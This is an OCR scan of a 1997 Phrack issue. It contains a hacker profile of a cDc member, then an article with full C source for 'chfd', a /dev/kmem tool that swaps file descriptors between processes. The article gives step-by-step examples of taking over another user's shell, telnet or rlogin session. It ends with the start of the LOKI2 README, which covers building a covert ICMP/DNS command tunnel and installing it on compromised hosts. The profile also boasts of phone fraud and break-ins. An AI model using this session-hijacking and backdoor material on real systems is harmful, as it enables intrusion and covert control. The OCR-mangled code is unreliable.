The top of the diagram has the modifications to be made to the phone unit 
itself, the bottom to the modular device. 
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[ Personal 


Handle: Grandmaster "Swamp" Ratte’ 
Call him: Kevin 
Past handles: KP Neato Dee (local BBSes) 
Handle origin: from playing around (and falling in) a swamp all the time 


as a kid 
Date of Birth: April, 1970 
Height: 67’ 
Weight: 155 lbs. 


Eye color: blue 
Hair Color: brown 

Computers: Apple J[ (plus/e/c/gs), PC (8088 laptop/’286), 

Amiga (500/600), Macintosh (Plus/7200) 

Admin of: Demon Roach Underground BBS, The Polka AE from Sept. 
’85-present 
Sites Frequented: Not much really. Mindvox can be pretty cool and 
interesting. I used to regularly call boards like The 
Works, Digital Logic’s Data Service, the various 
Metallands, Speed Demon Elite, P-80, Kingdom of Shit, 
Ripco, The Metal AE, Dark Side of the Moon, The Missing 
Link, etc. 
URLs: www.l0pht.com/cdc.html, and the new www.cultdeadcow.com 
Email: gratte@cultdeadcow.com 


[ Favorite Things 


Women: that aren’t crazy, freshly-scrubbed 
Cars: ones that run, muscle cars with lots of chrome 
Bikes: BMX 24" cruisers, Schwinn Stingrays with metal-flake paint 
Foods: cheap. Sunkist Orange Slurpees. 
Music: 1970’s funk and soul, rock, hip-hop, hillbilly country, 
reggae, dance... 
Bands: Run-DMC, Beatles, KISS, Marvin Gaye, Suicidal Tendencies, 
Black Uhuru, Public Enemy, Stevie Wonder, Rolling Stones. 
Zapp, Parliament/Funkadelic, Grandmaster Flash & The 
Furious Five, Dead Kennedies, Black Sabbath, Carpenters, 
James Brown, Metallica, Sly & The Family Stone, Lynyrd 
Skynyrd, Jimi Hendrix, Slayer, Minor Threat 
Instruments: Fender guitars and basses, Kurzweil K2000 series synths 
Computers: Apple ][s and Macintoshes 
Movies: Star Wars, The Manchurian Candidate, Krush Groove, 
Apocalypse Now 
Comics: Peanuts, Calvin & Hobbes, Bloom County 
Sports: Ultimate Frisbee, bicycling, wandering around outside, 
climbing trees and rocks, boating with inflatable life 
rafts in drainage lakes, club dancing 


Books: _Foucault’s Pendulum_ by Umberto Eco, The Bible, Farrah 
Fawcett’s biography, and _Understanding Media_ by Marshall 
McLuhan 
Magazines: Tons... 2600, Grand Royal, Wired, Macworld, Barely Legal, 


Thrasher, Big Brother, Ride BMX, Urb, Guitar Player, 
Keyboard, Cool Beans, Might, Stress, Slap, Crank, 4080, 
Cometbus, EQ, and whatever else I can get my grubby hands 
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on. I really dig magazines. Uh, and Phrack! 
TV: The Six Million Dollar Man, The Simpsons, Charlie’s Angels, 
X-Files, A-Team, Mod Squad 
My Bands: Superior Products (bass), Weasel-MX (vox, programming), 
Jinx Unit (bass, phat beatz) 


Quotes: "Fully equipped with an army of lawyers." -ad for Zoo York 
skateboards 
People: Evel Knievel, Boba Fett, Mr. T, and the CULT OF THE DEAD 


COW Multimedia Superstarz! 

Misc: thrift stores, huge shiny belt buckles, phresh new laces 
in my kicks, playing shows with my band(s), exploring 
buildings, big trees and rocks 

Turn Ons: energy 
Turn Offs: pretentiousness 


[ Passions 


If you can’t tell from the list up there, I’m really into music. It all 
started when the neighborhood teenagers would let me sit around with them and 
listen to the hard-rockin’ soundz of KISS and Led Zep when I was a little kid. 
So my mom (bless her heart) under their advisement, bought me Led Zeppelin 
_IV_ and KISS _Alive!_ which I took to kindergarden class and was reprimanded 
for. A few years later my grade school friends and I would spend hours 
sitting around a cassette player making "radio shows" with our Saturday Night 
Fever soundtrack and various 7" singles from K-Mart. We were rollin’ with the 
phattest mixtapes at age nine, fool! Somehow this led to MIDI and drum 
machines and CD burners and now I spend tons of time recording and sequencing 
and playing music. I do a lot of recording for the local punk and hip-hop 
groups and it’s hella fun. The back of the building I live in is a small 
empty warehouse where we have all-ages music shows and that’s pretty neat too. 
It’s called MOTOR... If you’re in a touring band, lemme know and send me a 
tape or whatever you’ve got. 


[ Memorable experiences 


Hmm. Well, this is probably my best story, so here we go: I found myself 

a alone at night inside a telco’s switching station. Ooh, look... a terminal 
keyboard. In the dim glow of the red "EXIT" signs, that keyboard represented 
all my hopes for a glorious unification of the human spirit through the global 
t 

n 

fe) 


elecommunications network. How could I best express my ...love... for this 

etwork and all that it represents? Write a poem? Done it already, hundreds 

fF times. Every cDc file I’ve put out is a gesture of affection. So I did 
what any red-blooded American male wouid do. I dropped my pants, "threw 


jacks" as it were, and doused that human-machine interface unit with my 
Seekrut Sauce. 


Then I cleaned myself and got the hell out of there... pulse pounding, 
freaked by my own insatiable lust. Is what I did "WRONG"? Don’t judge me 
with your pithy concepts of morality! I stood before God with my pants around 
my ankles and expressed what was in my heart. If that’s wrong, damn... I 
don’t want to be right! 


Playing a party where a gang fight broke out, caps were busted during our 
set, and we had to drop our instruments to flee for our livez (and hide under 
cars). 


Falling in love. Getting dumped. Lather, rinse, repeat. 
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Going to the various hacker cons is always a blast. Some people have a 
negative attitude about these things ’cause a lot of kids go and act retarded. 
Which is unfortunate, but I always manage to have a great time. These are th 
only times I get to visit with cDc people and it’s like a big bonding 
session... we just run around and hang out. Meet lots of cool people in 
general, every time. So go to the cons and don’t cause problems, and 
everything’1ll be fine. 


Starting cDc communications. In some ways this has been an important item 
in my life. Not that editing text files is a huge important thing, ’cause it’s 
not. But cDc, at its best, has taught me that I can have a role in making 
something creative and interesting and lasting. Things like that can carry 
over into a lot of aspects in your life. In 1984 I was a junior high student 
and now I’m 27 years old. cDc has changed a lot of course, as it should, but 
I think with our longevity we’ve worked towards finding a new way to relate to 
technology and the emerging global structure. I was fourteen and part of the 
wave of hacker kids who had been growing up with Atari 2600s at home and the 
video arcade after school... we saw the movie Wargames and got excited. I was 
lucky and had an Apple ][ at home, and soon a modem my dad brought home from 
work. You figured out some Stupid Phone Tricks and bam, in no time you were 
typing away to other kids on BBSes across the country, sharing.... codez and 
warez, sure, but more importantly we shared experiences. This was NEW. 

I remember how exciting it was to call teenager-run boards across the country 
in the early ’80s and exchange messages with these people. Now kids can grow 
up from the get-go with the Internet in their house and I think that’s just 
great. So my friends and I were writing things and doing goofy drawings and 
whatnot, and could have put out a regular paper /zine. But we figured out 
pretty early on that the one big advantage these text files we wrote had over 
some photocopied sheets we could staple together was distribution. If we’d 
done a paper ‘zine, we could have maybe scraped up enough cash for 50 copies 
or so and forced some friends to take them and then they’d end up at the 
bottom of a closet or in the trash in a few weeks, forgotten. But instead, we 
used those Stupid Phone Tricks hundreds of times... staying up all night, with 
school looming ahead in a few hours. But hey, gotta call that AE in New 
Jersey and upload the latest text files. You can always sleep through class. 


But what makes CULT OF THE DEAD COW different and has enabled us to last 
is that cDc has never been about technology... we didn’t form to trade "inpho" 
and hack together like the other groups. We used technology, be it hand -— 
hacked MCI codes or the Internet to get our "messages" out there. Hacking is 
a means to an end. I don’t give a rat’s ass about hacking or any of that crap 
on its own. I just want to make cool stuff. Now we’re starting a "paramedia" 
concept which means the end of cDc as a "hacker group that puts out text 
files." Now we’re putting out our own original music and other audio files, 
to be distributed just like our text stuff has traditionally been. The 
bandwidth is finally here where we can do it... and when it’s practical, we’ll 
be putting out video stuff too. The idea is to be able to do whatever sort of 
creative work we want and to use our huge distribution network to disseminate 
it. That’s what "cDc paramedia" and the future of our whole group is about. 


Somebody who was making his college schedule wrote m mail the other day, 


and asked "What classes should I take? I wanna be a hacker." I told him he’d 
be better off with some history and business courses. Please understand, I 
don’t mean to diss on hacking. I’m all for having all the knowledge you can 


and exploring things, whatever they may be. But I’ve met a lot of bitter old 
"gadget freaks" in this scene, and that’s something you want to stay away from. 


That mentality will crush the life out of you under the weight of a 
thousand bits of trivia. Go outside, there’s a world there already. It’s a 
zillion times more exciting and vibrant that what you can build staring into a 
monitor’s dim glare. Hour after hour, year after year. As your eyesight 
fails you and your head draws nearer the image, your shoulders slump. You 
become weak. You are less. 
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[ People to mention 


The Egyptian Lover: The whole 806 NPA’s only real phreak who ran a great 
BBS, The Missing Link, in 1984. I’ve only seen him a couple of times in 
person, but have to give him mad props for helping Franken Gibe and myself 
get situated with the phreak knowledge. His board attracted guys from The 
Apple Mafia and The Untouchables (the first warez groups ever), and The 
Knights of Shadow. Though I’d been getting warez since 1982, The Missing 
Link was our first contact with the real "elite" h/p scene, and it both 
fascinated and repulsed us. 


Franken Gibe: Bill helped start and really define cDc back in the day. 
He’s a really cool guy. I’ve known him for over ten years. What can I say? 
We’re still, to this day, working on things; though he hasn’t been active in 
cDc since '’89 or so. Now we’re trying to start an advertising agency. 


Tippy Turtle: Jason gave me my first local BBS number. I pushed him to 
finish "Bunny Lust", which is one of our most popular articles ever. There 
have been court cases inspired by that file, and he wrote it when he was 


fourteen. He came back to town last Christmas and I showed him the cDc web 
site. His comment? "That’s totally evil. I can’t believe how evil this is." 


Mohawk Dave: Christoph is another one of my oldest friends who never 
fails to diss cDc. He’s a mega-talented AI/robotics guy, and a rad 
guitarist and BMX freestyle rider too. Our group of friends spent countless 
hours cruising the neighborhoods of our hometown on bikes, talking, setting 
fires, breaking & entering, and having a good ol’ time. 


Ex-girlfriends: Blech. 


All the other cDc people. Dang, there’ve been maybe fifty or so over the 
years and they’ve all done their thing well and I’m really happy they did. 
They know what’s up... this part could run on forever, so I’1l just stop. 


[ Pearls Of Wisdom 


Procrastination is the denial of death. 
Lift with your legs, not your back. 


----[ EOF 
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[ File Descriptor Hijacking 


eat aa [ orabidoo <odar@pobox.com> 


Introduction 


We often hear of tty hijacking as a way for root to take over a user’s 
session. The traditional tools for this use STREAMS on SysV machines, 
and one article in Phrack 50 presented a way to do it in Linux, using 
loadable modules. 


I’1l describe here a simple technique that lets root take over a local 
or remote session. I’ve implemented it for Linux and FreeBSD; it should 
be easy to port it to just about any Un*x-like system where root can 
write to kernel memory. 


[The idea is simple: by tweaking the kernel’s file descriptor tables, one 
can forcefully move file descriptors from one process to another. 

This method allows you to do almost anything you want: redirect the 
output of a running command to a file, or even take over your neighbor’s 
telnet connection. 


How the kernel keeps track of open file descriptors 


In Un*x, processes access resources by means of file descriptors, which 


are obtained via system calls such as open(), socket() and pipe(). From 
the process’s point of view, the file descriptor is an opaque handle to 
the resource. File descriptors 0, 1 and 2 represent standard input, 


output and error, respectively. New descriptors are always allocated in 
sequence. 


On the other side of the fence, the kernel keeps, for each process, a 
table of file descriptors (fds), with a pointer to a structure for each 
fd. The pointer is NULL if the fd isn’t open. Otherwise, the structure 
holds information about what kind of fd it is (a file, a socket, a 

pipe, etc), together with pointers to data about the resource that the fd 
accesses (the file’s inode, the socket’s address and state information, 
and so on). 


The process table is usually an array or a linked list of structures. 
From the structure for a given process, you can easily find a pointer to 
the internal fd table for that process. 


In Linux, the process table is an array (called "task") of struct 
task_struct’s, and includes a pointer to a struct files_struct, which 
has the fd array (look at /usr/include/linux/sched.h for details). In 


SunOS 4, the process table is a linked list of struct proc’s, which 


include a pointer to the u_area, which has info about the fds (look at 
/usr/include/sys/proc.h). In FreeBSD, it’s also a linked list (called 
"allproc") of struct proc’s, which include a pointer to a struct 


filedesc with the fd table (also according to /usr/include/sys/proc.h). 


If you have read and write access to the kernel’s memory (which, in most 
cases, is the same as having read/write access to /dev/kmem), there’s 
nothing to prevent you from messing with these fd tables, stealing open 
fd’s from a process and reusing them in another one. 


The only major case where this won’t work are systems based on BSD4.4 
(such as {Free, Net, Open}BSD) running at a securelevel higher than 0. 
In that mode, write access to /dev/mem and /dev/kmem is disabled, among 


17 
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other things. However, many BSD systems run at securelevel -1, which leaves 
them vulnerable, and in many others it may be possible to get the securelevel 
to be -1 at the next boot by tweaking the startup scripts. On FreeBSD, you 
can check the securelevel with the command "sysctl kern.securelevel". Linux 
also has securelevels, but they don’t prevent you from accessing /dev/kmem. 


File descriptor hijacking 


The kernel’s internal variables are really not made to be modified like 
this by user programs, and it shows. 


First of all, on a multitasking system, you have no guarantee that the 
kernel’s state won’t have changed between the time you find out a 
variable’s address and the time you write to it (no atomicity). This is 
why these techniques shouldn’t be used in any program that aims for 
reliability. That being said, in practice, I haven’t seen it fail, because 
the kernel doesn’t move this kind of data around once it has allocated it 
(at least for the first 20 or 32 or 64 or so fds per process), and because 
it’s quite unlikely that you’1ll do this just when the process is closing or 
opening a new fd. 


You still want to try it? 


For simplicity’s sake, we won’t try to do things like duplicating an fd 
between two processes, or passing an fd from one process to another 
without passing another one in return. Instead, we’ll just exchange an 
fd in one process with another fd in another process. This way we only 
have to deal with open files, and don’t mess with things like reference 
counts. This is as simple as finding two pointers in the kernel and 
switching them around. A slightly more complicated version of this 
involves 3 processes, and a circular permutation of the fds. 


Of course, you have to guess which fd corresponds to the resource you 
want to pass. To take complete control of a running shell, you’ll want 
its standard input, output and error, so you’ll need to take the 3 fds 
0, 1 and 2. To take control of a telnet session, you’ll want the fd of 
the inet socket that telnet is using to talk to the other side, which is 
usually 3, and exchange it with another running telnet (so it knows what 
to do with it). Under Linux, a quick look at /proc/[pid]/fd will tell 
you which fds the process is using. 


Using chfd 


I’ve implemented this for Linux and FreeBSD; it would be fairly easy to 
port to other systems (as long as they let you write to /dev/mem or 
/dev/kmem, and have the equivalent of a /usr/include/sys/proc.h to 
figure out how it works). 


To compile chfd for Linux, you need to figure out a couple things about 
the running kernel. If it’s a 1.2.13 or similar, you’ll need to 
uncomment the line /* #define OLDLINUX */, because the kernel’s 
structures have changed since then. If it’s 2.0.0 or newer, it should 


work out of the box, although it could change again... 


Then you need to find the symbol table for the kernel, which is usually 
in /boot/System.map or similar. Make sure this corresponds to the 
kernel that is actually running, and look up the address for the "task" 
symbol. You need to put this value in chfd, instead of "00192d28". 
Then compile with "gcc chfd.c -o chfd". 


[To compile chfd for FreeBSD, just get the FreeBSD code and compile it 
with "gcc chfd.c -o chfd -lkvm". This code was written for FreeBSD 
2.2.1, and might need tweaking for other versions. 
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Once it’s compiled, you invoke chfd with 


chfd pidl fdl pid2 £d2 
or 
chfd pidl fdl pid2 fd2 pid3 £d3 


In the first case, the fds are just swapped. In the second case, the 
second process gets the first’s fd, the third gets the second’s fd, and 
the first gets the third’s fd. 


As a special case, if one of the pids is zero, the corresponding fd is 
discarded, and a fd on /dev/null is passed instead. 


Example 1 


a long calculation is running with pid 207, and with output to the tty 
you type "cat > somefile", and look up cat’s pid (say 1746) 


Then doing 


chfd 207 1 1746 1 


will redirect the calculation on the fly to the file "somefile", and the 
cat to the calculation’s tty. Then you can *C the cat, and leave the 
calculation running without fear of important results scrolling by. 


someone is running a copy of bash on a tty, with pid 4022 
you are running another copy of bash on a tty, with pid 4121 


Then you do 


sleep 10000 

on your own bash, so it won’t read its tty for a while, 
otherwise your shell gets an EOF from /dev/null and leaves 
the session immediately 

chfd 4022 0 0 0 4121 0 

chfd 4022 10 0 4121 1 

chfd 4022 2 0 0 4121 2 


and you find yourself controlling the other guy’s bash, and getting the 
output too, while the guy’s keystrokes go to /dev/null. When you exit 
the shell, he gets his session disconnected, and you’re back in your 
sleep 10000 which you can safely “C now. 


Different shells might use different file descriptors; zsh seems to use 
fd 10 to read from the tty, so you’ll need to exchange that too. 


Example 3 


someone is running a telnet on a tty, with pid 6309 

you start a telnet to some worthless port that won’t drop the 
connection too quickly (telnet localhost 7, telnet www.yourdomain 80, 
whatever), with pid 7081 

under Linux, a quick look at /proc/6309/fd and /proc/7081/fd tells you 
telnet is using fds 0, 1, 2 and 3, so 3 must be the connection. 


Then doing 


chfd 6309 3 7081 3 0 0 
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will replace the network connection with a /dev/null on the guy’s telnet 
(which reads an EOF, so he’1ll get a "Connection closed by foreign 
host."), and your telnet finds itself connected to the guy’s remote 
host. At this point you’ll probably need to press *] and type "mode 
character" to tell your telnet to stop echoing your lines locally. 


Example 4 


someone is running an rlogin on a tty; each rlogin uses two processes, 
with pids 4547 and 4548 
you start an rlogin localhost on another tty, with pids 4852 and 4855 
a quick look at the relevant /proc/../fds tells you that each of the 
rlogin processes is using fd 3 for the connection. 


Then doing 


chfd 4547 3 4552 3 
chfd 4548 3 4555 3 


does just what you expect. Except that your rlogin may still be blocked 
by the kernel because it’s waiting on an event that won’t happen (having 
data to read from localhost); in that case you wake it up with a kill 
-STOP followed by ’fg’. 


You get the idea. When a program gets another one’s fd, it’s important 
that it knows what to do with it; in most cases you achieve this by 
running a copy of the same program you want to take over, unless you’re 
passing a fd on /dev/null (which gives an EOF) or just passing 
stdin/stdout/stderr. 


Conclusion 


As you can see, you can do quite powerful things with this. And there 
isn’t really much you can do to protect yourself from some root doing 
this, either. 


It could be argued that it’s not even a security hole; root is 
*supposed* to be able to do these things. Otherwise there wouldn’t be 
explicit code in the drivers for /dev/kmem to let you write there, would 
there? 


The Linux code 


<++> fd_hijack/chfd-linux.c 
/* chfd - exchange fd’s between 2 or 3 running processes. 


* 


This was written for Linux/intel and is *very* system-specific. 
Needs read/write access to /dev/kmem; setgid kmem is usually enough. 


Use: chfd pidl fdl pid2 fd2 [pid3 £d3] 


With two sets of arguments, exchanges a couple of fd between the 

two processes. 

With three sets, the second process gets the first’s fd, the third gets 
the second’s fd, and the first gets the third’s fd. 


Note that this is inherently unsafe, since we’re messing with kernel 
variables while the kernel itself might be changing them. It works 
in practice, but no self-respecting program would want to do this. 


2, ae, Si a a A A eC Te CO a 


Written by: orabidoo <odar@pobox.com> 


5.txt Wed Apr 26 09:43:42 2017 5 


First version: 14 Feb 96 
This version: 2 May 97 
*/ 


include <stdio.h> 

include <unistd.h> 

include <fcntl.h> 

define _ KERNEL _ /* needed to access kernel-only definitions */ 
include <linux/sched.h> 


/* #define OLDLINUX */ /* uncomment this if you’re using Linux 1.x; 
tested only on 1.2.13 */ 


#define TASK 0x00192d28 /* change this! look at the system map, 
usually /boot/System.map, for the address 
of the "task" symbol */ 


ifdef OLDLINUX 
define FDO ((char *)&ts.files->fd[0] - (char *) &ts) 
define AD(fd) (taskp + FDO + 4% (fd)) 
else 
define FILES ((char *)&ts.files —- (char *) &ts) 
define FDO ((char *)&fs.fd[0] - (char *) &fs) 
define AD(fd) (readvalz(taskp + FILES) + FDO + 4*(fd)) 
endif 
int kfd; 


struct task_struct ts; 
struct files_struct fs; 
int taskp; 


int readval(int ad) { 
int val, r; 


if (lseek(kfd, ad, SEEK_SET) < 0) 
perror("lseek"), exit(1l); 
if ((r = read(kfd, &val, 4)) != 4) { 
if (r < 0) 
perror ("read"); 
else fprintf(stderr, "Error reading...\n"); 
exit(1); 


} 


return val; 


} 


int readvalz(int ad) { 
int r = readval (ad); 
if (r == 0) 
fprintf(stderr, "NULL pointer found (fd not open?) \n"), exit(1); 
return r; 


} 


void writeval(int ad, int val) { 
int w; 
if (lseek(kfd, ad, SEEK_SET) < 0) 
perror("lseek"), exit(1l); 
if ((w = write(kfd, &val, 4)) != 4) { 


if (w < 0) 

perror ("write"); 
else fprintf(stderr, 
exit (1); 


W 


Error writing...\n"); 


} 


void readtask(int ad) { 
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int r; 


if (lseek(kfd, ad, SEEK_SET) <0) 
perror("lseek"), exit(1l); 
if ((r = read(kfd, &ts, sizeof(struct task_struct))) != 
sizeof(struct task_struct)) { 
if (r < 0) 
perror ("read"); 
else fprintf(stderr, "Error reading...\n"); 
exit (1); 


} 


void findtask(int pid) { 
int adr; 


for (adr=TASK; ; adr+=4) { 
if (adr >= TASK + 4*NR_TASKS) 
fprintf(stderr, "Process not found\n"), exit(1); 
taskp = readval (adr); 
if (!taskp) continue; 
readtask (taskp); 
if (ts.pid == pid) break; 


} 
int main(int argc, char **argv) { 


int pidl, fdl, pid2, fd2, adl, vall, ad2, val2, pid3, fd3, ad3, val3; 
int three=0; 


if (argc != 5 && argc != 7) 
fprintf(stderr, "Use: %s pidl fdl pid2 fd2 [pid3 fd3]\n", argv[0]), 
exit(1); 


pidl = atoi(argv[1]), fdl = atoi(argv[2]); 
pid2 = atoi(argv[3]), fd2 = atoi(argv[4]); 
if (argc == 7) 
pid3 = atoi(argv[5]), fd3 = atoi(argv[6]), three=1; 


if (pidl == 0) 
pidl = getpid(), fdl = open("/dev/null", O_RDWR) ; 
it (eid2°==90) 


pid2 = getpid(), fd2 = open("/dev/null", O_RDWR) ; 
if (three && pid3 == 0) 
pid3 = getpid(), fd3 = open("/dev/null", O_RDWR) ; 


d = open("/dev/kmem", O_RDWR) ; 
(kfd < 0) 
perror("open"), exit(1l); 


Fh Fh 


findtask (pidl); 

adl = AD(fdl); 

vall = readvalz(adl1); 

printf ("Found fd pointer 1, value %.8x, stored at %.8x\n", vall, adl); 


findtask (pid2) ; 

ad2 = AD(fd2); 

val2 = readvalz(ad2); 

printf ("Found fd pointer 2, value %.8x, stored at %.8x\n", val2, ad2); 


if (three) { 
findtask (pid3) ; 
ad3 = AD(fd3); 
val3 = readvalz(ad3); 
printf ("Found fd pointer 3, value %.8x, stored at %.8x\n", val3, ad3); 


} 


if (three) { 
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if (readval(adl1l)!=vall || readval(ad2)!=val2 || readval(ad3)!=val3) { 
fprintf(stderr, "fds changed in memory while using them - try again\n"); 
exit(1); 

} 

writeval(ad2, vall); 

writeval(ad3, val2); 

writeval(adl, val3); 

} else { 

if (readval(adl)!=vall || readval(ad2)!=val2) { 
fprintf(stderr, "fds changed in memory while using them - try again\n"); 
exit(l1); 

} 

writeval(adl, val2); 

writeval(ad2, vall); 


} 
pr 
} 


<-=> 


The 


intf("Done!\n"); 


FreeBSD code 


sai pa 2s 


/ 


+ + + + + + + F F F FF FF FF FF FF FF FF F F OF 


fd_hijack/chfd-freebsd.c 
chfd - exchange fd’s between 2 or 3 running processes. 
FreeBSD and is *very* system-specific. Needs 


/dev/mem and /dev/kmem; only root can usually 
the system is running at securelevel -l. 


This was written for 
read/write access to 
do that, and only if 


Use: chfd pidl fdl pid2 fd2 [pid3 fd3] 
Compile with: gcc chfd.c -o chfd -lkvm 


With two sets of arguments, 
two processes. 

With three sets, 
gets the second’s fd, 


exchanges a couple of fd between the 
the second process gets the first’s fd, the third 
and the first gets the third’s fd. 


Note that this is inherently unsafe, since we’re messing with kernel 
variables while the kernel itself might be changing them. It works 
in practice, but no self-respecting program would want to do this. 


Written by: 
FreeBSD version: 


orabidoo <odar@pobox.com> 
4 May 97 


<stdio.h> 
<fentl.h> 
<kvm.h> 
<sys/proc.h> 


lude 
lude 
lude 
lude 


define F 
define A 


kvm_t *kf 


struct proc p; 


Uu 


long pr 


define N 


EXTP 
ILES 
D (fd) 


d; 


ocp, 


((char *)&p.p_list.le_next - 


((char *)&p.p_fd - 


(readvalz (readvalz(procp + FILES) ) 


allproc; 


struct nlist nm[2]; 


Uu_ 
u_long 


if 


return 


val; 


(kvm_read(kfd, 
fprintf(stderr, 


val; 


long readval(u_long ad) { 


ad, éval, 4) 


"error reading...\n"), 


(char *) &p) 


4) 


fe) 


exit (1); 


5.txt 
} 


u_long readvalz(u_long ad) { 
u_long r readval (ad); 
if (cr == 0) 
fprintf(stderr, 
return r; 


} 


void writeval(u_long ad, 
if (kvm_write(kfd, ad, 
fprintf(stderr, 


} 


void readproc(u_long ad) { 
if (kvm_read(kfd, ad, &p, 
fprintf(stderr, 

} 


void findproc(int pid) { 
u_long adr; 
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"NULL pointer found 


u_long val) { 
éval, 
"error writing...\n"), 


4) != 4) 


sizeof (struct proc) ) 


"error reading a struct proc...\n"), 


adr; adr 


for (adr = readval(allproc); 
procp = adr; 
readproc(procp) ; 
if (p.p_pid == pid) return; 


} 
fprintf(stderr, 
exit(1); 

} 


int main(int argc, 


"Process not found\n"); 


char **argv) { 


(fd not open?) \n"), 


exit (1); 


exit (1); 


'= sizeof (struct proc) ) 
exit(1); 


readval(adr + NEXTP)) {f{ 


int pidl, fdl, pid2, fd2, pid3, fd3; 
u_long adl, vall, ad2, val2, ad3, val3; 
int three=0; 
if (argc != 5 && argc != 7) 
fprintf(stderr, "Use: %s pidl fdl pid2 fd2 [pid3 fd3]\n", argv[0]), 
exit(1); 
pidl = atoi(argv[1]), fdl = atoi(argv[2]); 
pid2 = atoi(argv[3]), fd2 = atoi(argv[4]); 
if (argc == 7) 
pid3 = atoi(argv[5]), fd3 = atoi(argv[6]), three=1; 
if (pidl == 0) 
pidl = getpid(), fdl = open("/dev/null", O_RDWR) ; 
if (pid2 == 0) 
pid2 = getpid(), fd2 = open("/dev/null", O_RDWR) ; 
if (three && pid3 == 0) 
pid3 = getpid(), fd3 = open("/dev/null", O_RDWR) ; 
kfd = kvm_open(NULL, NULL, NULL, O_RDWR, "chfd") ; 
if (kfd == NULL) exit(1); 
bzero(nm, 2*sizeof(struct nlist)); 
nm[0O].n_name = "_allproc"; 
nm[1].n_name = NULL; 
if (kvm_nlist(kfd, nm) != 0) 
fprintf(stderr, "Can’t read kernel name list\n"), exit(1); 


al 


lproc = nm[0].n_value; 
findproc(pidl); 

adl AD (fdl); 

vall readvalz(adl); 


printf("Found fd pointer 1, 


findproc(pid2) ; 


value %.8x, 


stored at %.8x\n", 


vall, adl); 
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ad2 = AD(fd2); 
val2 = readvalz(ad2); 
printf ("Found fd pointer 2, value %.8x, stored at %.8x\n", val2, ad2); 


if 


} 


if 


} 


fo) 


(three) { 
findproc(pid3); 
ad3 = AD(fd3); 
val3 = readvalz(ad3); 
printf ("Found fd pointer 3, value %.8x, stored at %.8x\n", val3, ad3); 


(three) { 

if (readval(adl1l)!=vall || readval(ad2)!=val2 || readval(ad3)!=val3) { 
fprintf(stderr, "fds changed in memory while using them - try again\n"); 
exit (1); 

} 

writeval(ad2, vall); 

writeval(ad3, val2); 

writeval(adl, val3); 

else { 

if (readval(adl)!=vall || readval(ad2)!=val2) { 
fprintf(stderr, "fds changed in memory while using them - try again\n"); 
exit(1); 


} 
writeval(adl, val2); 
writeval(ad2, vall); 


printf ("Done!\n"); 
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---[ Phrack Magazine Volume 7, Issue 51 September 01, 1997, article 06 of 17 


Eo «OK: 2 (the implementation) 


[ daemon9 <route@infonexus.com> 


----[ Introduction 


This is the companion code to go with the article on covert channels in 
network protocols that originally appeared in P49-06. The article does not 
explain the concepts, it only covers the implementation. Readers desiring more 
information are directed to P49-06. 


fats 


LOKI2 is an information-tunneling program. It is a proof of concept work 
intending to draw attention to the insecurity that is present in many network 
protocols. In this implementation, we tunnel simple shell commands inside of 
ICMP_ECHO / ICMP_ECHOREPLY and DNS namelookup query / reply traffic. To the 
network protocol analyzer, this traffic seems like ordinary benign packets of 
the corresponding protocol. To the correct listener (the LOKI2 daemon) 
however, the packets are recognized for what they really are. Some of the 
features offered are: thr different cryptography options and on-the-fly 
protocol swapping (which is a beta feature and may not be available in your 
area). 


The vulnerabilities presented here are not new. They have been known 
about and actively exploited for years. LOKI2 is simply one possible 
implementation. Implementations of similar programs exist for UDP, TCP, IGMP, 
etc... This is by no means limited to type 0 and type 8 ICMP packets. 


Before you go ahead and patch owned hosts with lokid, keep in mind that 
when linked against the crypto libraries, it is around 70k, with about 16k 
alone in the data segment. It also forks off at least twice per client 
request. This is not a clandestine program. You want clandestine? 
Implement LOKI2 as an lkm, or, even better, write kernel diffs and make it 
part of the O/S. 


[ BUILDING AND INSTALLATION 


Building LOKI2 should be painless. GNU autoconf was not really needed for 
this project; consequently you may have to edit the Makefile a bit. This 
shouldn’t be a problem, becuase you are very smart. 


S=== I. Edit the toplevel Makefil 


1) Make sure your OS is supported. As of this distribution, we suppport the 
following (if you port LOKI2 to another architecture, please send me th 


diffs): 
Linux 25 Og 
OpenBSD 2.1 
FreeBSD 2.1.x 
Solaris 2.5.x 


2) Pick an encryption technology. STRONG_CRYPTO (DH and Blowfish), 
WEAK_CRYPTO (XOR), or NO_CRYPTO (data is transmitted in plaintext). 


3) If you choose STRONG_CRYPTO, uncomment LIB _CRYPTO_PATH, CLIB, and MD5_OBJ. 
You will also need SSLeay (s below). 


4) Chose whether or not to allocate a psudeo terminal (PTY) (may not be 
implemented) or just use popen (POPEN) and use the 
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‘pipe -> fork -> exec -> sh* sequence to execute commands. 


5) See Net/3 restrictions below and adjust accordingly. 

6)  Pausing between sends is a good idea, especially when both hosts are on 
the same Ethernet. We are dealing with a potentially lossy protocol and 
there is no reliablity layer added as of this version... SEND_PAUSE 
maintains some order and keeps the daemon from spewing packets too fast. 


You can also opt to increase the pause to a consdiderably larger value, 
making the channel harder to track on the part of the netework snooper. 
(This would, of course, necessitate the client to choose an even larger 
MIN_TIMEOUT value. 


----[ II. Supplemental librarys 


1) If you are using STRONG_CRYPTO you will need to get the SSLeay crypto 
library, version 0.6.6. DO NOT get version 0.8.x as it is untested with 
LOKI2. Hopefully these URLS will not expire anytime soon: 


ftp://ftp.psy.uq.oz.au/pub/Crypto/SSL/SSLeay-0.6.6.tar.gz 
ftp://ftp.uni-mainz.de/pub/internet/security/ssl 


2) Build and install SSLeay. If you decide not to install it, Make sure you 
correct the crypto library path LIB_CRYPTO_PATH in the Makefile and 
include paths in loki.h. 


----[ III. Compilation and linking 


1) From the the toplevel directory, ‘make systemtype*. 


2) This will build and strip the executables. 


----[ IV. Testing 


1) Start the daemon in verbose mode using ICMP_ECHO (the default) *./lokid* 


2) Start up a client *./loki -d localhost * 


3) Issue an ‘l1s*. 
4) You should see a short listing of the root directory. 
5) Yay. 


6) For real world testing, install the daemon on a remote machine and go to 
town. See below for potential problems. 


=——— V. Other Options 


The loki.h header file offers a series of configurable options. 


MIN_TIMEOUT is the minimum amount of time in whole seconds the client will 
wait for a response from the server before the alarm timer goes off. 


MAX _RETRAN (STRONG_CRYPTO only) is the maximum amount of time in whole 
seconds the client will retransmit its initial public key 
handshaking packets before giving up. This feature will be 
deprecated when a reliability layer is added. 


MAX_CLIENT is the maximum amount of clients the server will accept and 
service concurrently. 
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KEY_TIMER is the maximum amount of time in whole seconds an idle client 
entry will be allowed to live in the servers database. If this 
amount of time has elapsed, all entries in the servers client 
database that have been inactive for KEY_TIMER seconds will be 
removed. This provides the server with a simple way to clean up 
resources from crashed or idle clients. 


[ LOKI2 CAVEATS AND KNOWN BUGS 


Net/3 Restrictions 


